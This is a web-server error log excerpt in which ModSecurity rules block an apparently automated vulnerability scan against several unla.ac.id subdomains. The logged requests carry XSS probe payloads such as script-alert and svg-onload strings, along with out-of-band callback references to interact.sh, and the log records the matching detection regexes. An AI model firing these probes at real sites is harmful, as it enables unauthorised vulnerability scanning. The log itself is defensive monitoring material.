"/payform.php"] [unique_id "ZO16NMCo-f0AAAqTvpQAAAAa"]
[Tue Aug 29 11:55:16.774480 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6BkAAAAr"]
[Tue Aug 29 11:55:17.555302 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqw500AAAAH"]
[Tue Aug 29 11:55:17.555642 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqY6CoAAAAr"]
[Tue Aug 29 11:55:17.622513 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqw508AAAAH"]
[Tue Aug 29 11:55:17.622727 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqSwrQAAAAN"]
[Tue Aug 29 11:55:17.625603 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqvjmsAAAAE"]
[Tue Aug 29 11:55:17.628172 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAolKlkAAAAe"]
[Tue Aug 29 11:55:17.663918 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAolKloAAAAe"]
[Tue Aug 29 11:55:17.664775 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqSwrUAAAAN"]
[Tue Aug 29 11:55:17.697255 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqTvpsAAAAa"]
[Tue Aug 29 11:55:17.712822 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NcCo-f0AAAolKlwAAAAe"]
[Tue Aug 29 11:55:17.717508 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqTvpwAAAAa"]
[Tue Aug 29 11:55:17.735111 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NcCo-f0AAAolKl0AAAAe"]
[Tue Aug 29 11:55:18.587413 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NsCo-f0AAAqvjnEAAAAE"]
[Tue Aug 29 11:55:18.594785 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqsV5IAAAAB"]
[Tue Aug 29 11:55:18.594977 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqY6DEAAAAr"]
[Tue Aug 29 11:55:18.606483 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqvjnIAAAAE"]
[Tue Aug 29 11:55:18.647146 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqsV5QAAAAB"]
[Tue Aug 29 11:55:18.650742 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NsCo-f0AAAqSwroAAAAN"]
[Tue Aug 29 11:55:18.701467 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqeFTkAAAAx"]
[Tue Aug 29 11:55:19.569456 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqeFTwAAAAx"]
[Tue Aug 29 11:55:19.572180 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAolKmIAAAAe"]
[Tue Aug 29 11:55:19.575664 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqqtc4AAAAA"]
[Tue Aug 29 11:55:19.680779 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAApbUewAAAAh"]
[Tue Aug 29 11:55:19.709634 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqTvp8AAAAa"]
[Tue Aug 29 11:55:19.780538 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAolKmQAAAAe"]
[Tue Aug 29 11:55:19.783581 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqsV5oAAAAB"]
[Tue Aug 29 11:55:19.803229 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAoAk-kAAAAC"]
[Tue Aug 29 11:55:19.805716 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqsV5sAAAAB"]
